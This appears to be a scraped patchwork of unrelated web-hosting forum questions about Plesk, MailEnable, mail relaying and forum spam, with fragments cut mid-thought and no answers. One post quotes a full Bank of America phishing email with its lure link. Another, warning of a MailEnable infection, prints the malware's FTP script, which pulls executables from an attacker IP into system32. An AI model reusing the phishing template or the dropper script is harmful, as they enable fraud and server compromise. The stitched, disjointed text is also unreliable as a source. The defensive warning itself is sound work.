I added users directly to MailEnable (using their migration utility to import from an old mail server which Plesk does not support). The domains exist in Plesk but not the individual email users/mailboxes.
Now I want to add those email users to Plesk but it doesn't let me (not surprisingly); when I try to add a user it returns an error: "Unable to update the mail account properties:mailmng failed: MEAOPO.Mailbox.AddMailbox failed"
My question is: How can I add the users that already exist in MailEnable to the Plesk configuration? (i.e. ignore the error and add the user to the Plesk database, or even better if Plesk can read the configuration and add all users)
The Plesk KB articles suggest running mchk.exe, but that is designed to take users from Plesk and add them to MailEnable; I need the reverse.
Is there a way to configure the mailing lists created with Plesk (using MailEnable 6.5) using Plesk or another web interface like it is possible with mailman under Linux?
It is not very convenient to be required to do such stuff via RDP (and so manual by me for every customer)...
I use Windows Plesk v 11.5.30 with MailEnable Standard Edition version 7.0. On the MailEnable site I saw a new version of MailEnable Standard (7.5.1). URL...Can I download it and update the MailEnable version of my Windows Plesk? If I make this change and have problems, can I downgrade later?
Sometimes my clients install untrusted scripts in their accounts, which causes spamming because these scripts send a high number of spam emails. Is there an automatic way to disable the PHP mail function, or to disable the account temporarily?
I have recently been receiving reports from AOL's feedback loop that my server is sending out spam. I have checked the whole server, but cannot find anything strange.
There are some strange things with these feedback reports. I'll post a few lines below (I crossed out my domain with xxx):
Quote:
Received: from andersenreesel by holderem.xxx.biz with local (Exim 4.23)
Received: (qmail 64859 invoked by uid 24901)
Received: from janislanhami by xxx.biz with local (Exim 4.26)
Received: from raphaelpinkertone by standei.xxx.biz with local (Exim 4.23)
Received: from imanoldelphine by dispatched.xxx.biz with local (Exim 4.23)
Received: from conrado by hostic.xxx.biz with local (Exim 4.23)
The first issue I have is with the subdomains, like "dispatched", "standei", "hostic", etc. These subdomains do not exist on my system. Also, my server does not run the Exim MTA.
Another issue I have is the "invoked by uid" statements with UIDs 147 and 24901. These UIDs do not exist on my system. The passwd file UIDs go to around 110.
Apart from these strange things, the IP that is listed in the upper part of the headers:
Quote:
Received: from xxx.biz (xxx.biz [85.xxx.xxx.xxx])
The domain and IP address are correct there, which should indicate that the spam was sent from my system. Or wasn't it?
I host a vBulletin forum on a US server. I've been getting a lot of signups from one particular spammer, wanting to post about gold harvesting for WoW. I've blocked his IP's, however he keeps using proxies.
He constantly signs up under the name "Array"... Is there a way I can block him for good? I can't moderate user sign-ups, as I'm mostly away from my computer and can't moderate them all the time.
When I click the "Email Accounts" section in Helm I see "Failed to get Email Accounts"; I also can't add any new Email Account. Helm Log:
Cannot create ActiveX component.
at Microsoft.VisualBasic.Interaction.CreateObject(String ProgId, String ServerName)
at MailEnable.Administration.Mailbox.GetAutoResponderStatus()
at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccount(String name)
at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccountList()
at MailEnableProvider.ListEmailAccounts(ProviderData CommandData) ......
None of the domains in this email are hosted with us, but there are thousands of emails a day that somebody blasts into our queue. We have failed to detect it. We have enabled phpnobody spam logging but failed to track down this user.
How to catch this spammer? There are no clues to catch him.
[root@sm4 ~]# /root/qmHandle -m3261696
-------------- MESSAGE NUMBER 3261696 --------------
Received: (qmail 7056 invoked from network); 16 May 2007 05:34:18 -0500
Received: from axicom.net (HELO User) (67.112.176.250) by 14.32.5446.static.theplanet.com with SMTP; 16 May 2007 05:34:18 -0500
Reply-To: <notice@boamilitary.com>
From: "Bank of America Military Bank"<notice@boamilitary.com>
Subject: Notification from Bank of America Military Bank
Date: Wed, 16 May 2007 04:44:51 -0700
MIME-Version: 1.0
Content-Type: text/html; charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
<title>Military Bank Online and Bill Payer Deactivation</title> <FONT face=Arial size=2> </FONT> <DIV> <p><font face="Arial" size="2" color="#FFFFFF"> ...<img border="0" src="http://power-web43.net/images/boa.bmp"></font></p> <p><font face="Arial" size="2"> Dear Member,</font></p> <DIV><font face="Arial" size="2"> This is your official notification from Bank of America Military Bank that the service(s) listed below<BR> will be deactivated and deleted if not renewed immediately. Previous notifications have<BR> been sent to the Billing Contact assigned to this account. As the Primary Contact, you<BR> must renew the service(s) listed below or it will be deactivated and deleted. <BR> <BR> <BR> <b> <a target="_blank" href="http://moremail.epicalliance.com/america.php"><FONT color=#003399>Renew Now</FONT></a> </b>your <b>Military Bank Online </b>and<b> Bill Payer </b> services.</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"><BR> SERVICE: <b>Military Bank Online </b>and<b> Bill Payer</b>.<BR> EXPIRATION: <b>May, 18 2007</b></font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"><BR> Thank you for using Military Bank Online. <br> We appreciate your business and the opportunity to serve you.</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"> Bank of America Military Bank Member Service</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"><BR> *****************************************************************************<BR> IMPORTANT MEMBER SERVICE INFORMATION<BR> *****************************************************************************</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"> Please do not reply to this message. 
For any inquiries, contact Member Service.</font></DIV> <DIV><font face="Arial" size="2"> </font></DIV> <DIV><font face="Arial" size="2"> <BR> Copyright © 2007 Bank of America Corporation. All rights reserved.</font></DIV> </DIV>
I didn't see this posted anywhere here so I just thought I'd give everyone who uses MailEnable a heads up. If you are not using the most up to date version of MailEnable, run to [url] and download it.
I have seen a couple of dozen boxes getting infected because they had MailEnable Standard 1.95, for instance (or Professional 2.11), or anything else that's not up to date. Virus(es) are severe and will cause you a lot of problems... if your server still hasn't been infected and you're not using the latest MailEnable, go upgrade right away!
If you are a hosting company and are using Plesk 7.6.1 you definitely have your helpdesk swamped by now. The biggest problem is that Plesk 7.6.1 comes with MailEnable Std 1.95 where the latest version is 1.981. I have seen servers that were clean OS installs, Plesk 7.6.1 installed, and 5 minutes after, the box was compromised.
If you are still able to access the box by RDP (or have access to it locally), make sure to disable MailEnable SMTP Relay Service. This is not a part of MailEnable and if you don't disable it you won't be able to remove rdriv.sys from your system32 directory, which does quite something to your server. Also check for the following:
Make sure you don't have script1.txt in system32, and if you have it make sure to remove it. It contains:
open XXX.XXX.XXX.XXX (IP edited away by Boon Chuan to prevent abuse)
user anonymous anonymous@on.the.net
lcd c:\windows\system32
get explorer.exe
get runservice_bis.dll
get kill.exe
get fport.exe
get hyberport.exe
get JASFV.INI
bye
Nothing has been heard from SWsoft about this issue yet...
I have MailEnable free on a Windows server with Plesk 8.1.
I need IMAP so I thought of hMail. The problem:
I need to copy all the mail content to hMail, as I understand Plesk will copy all the accounts except the mail content.
I have found that I can use some vbs from PMM, but that requires me to know all the accounts' passwords and to manually do every backup/restore for all the e-mails.
Is there another way to switch to hMail without losing the mail content? (IMAPCopy is not an option as it needs IMAP and that is not present in MailEnable free, and it also needs all the passwords for all the accounts.)
Another problem: I do not have another Windows server, so I cannot use Plesk Migration Manager to migrate accounts and then migrate back.
Now first I will say I have NO idea how such spamming works, how a punk can get on my server and send emails out.
I have had a team look at it and they also did something, but now it has happened again for the 5th time. What can I do? Are there any software or tools one can use, like an antivirus, to check the server, and how can I avoid such sh..
I just found posts every few days from an apparent spammer "sagepowder" in my forum (not so popular and has nothing to do with skiing). The subject is always "new here".
The content is "Any snowboarders or skiiers on this forum? I am planning a trip to BC on a snowboarding trip next week" or "I am new here, just saying hello".
I checked the Apache log and it doesn't seem to be a robot script posting this, i.e. it browses to the index page, picks up my hidden field that blocks robots, posts a new topic, then goes back to the index page.
What surprised me is that when I google this guy, I got 108,000 results with the same content on tons of forums! All with total post number of 1 or 2 on each forum: [url]
I recently moved web services for one of my hosted domains (let's call it example.com) from one server (let's call it .org) to another server (let's call it .net). example.com has been on .org for about 5 years. .org handled all example.com web services, and all email. I recently updated example.com's DNS record to point www.example.com and example.com to the .net server. I didn't change the MX record or mail.example.com to point to .net. Mail continues to be delivered normally to example.com on the .org server.
Except now spammers are hitting the .net server, e.g.
Is it normal practice for spammers to send dictionary attack based spam to a domain's server that doesn't even handle email? All the spam coming in is clearly just random email addresses not based on anything that exists at the domain, and most of the addresses are so very random I can't imagine they exist anywhere.
For about a month or so now I have a domain I host under serious attack from what I think are spammers. It's a wordpress site, and they are getting big numbers of POST requests to the WordPress comments file, e.g.
Code:
POST /wp-comments-post.php HTTP/1.1
It's a well distributed attack, and I'm doing well with some scripts I wrote to block the requests to the wp-comments-post.php file. The real comment file has long since been moved, so any POST to the file gets firewalled. It's several thousand IPs from all over the place.
I don't believe it's a malicious attempt to bring the site down, but I'm guessing it's a blog comment spammer that has something set wrong and he's pounding this site to death by accident. I could be wrong on that though.
We received a report of a malicious mail being sent from our servers. Problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs show that the connection was made from 127.0.0.1 to the SMTP service, but that's it.
We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.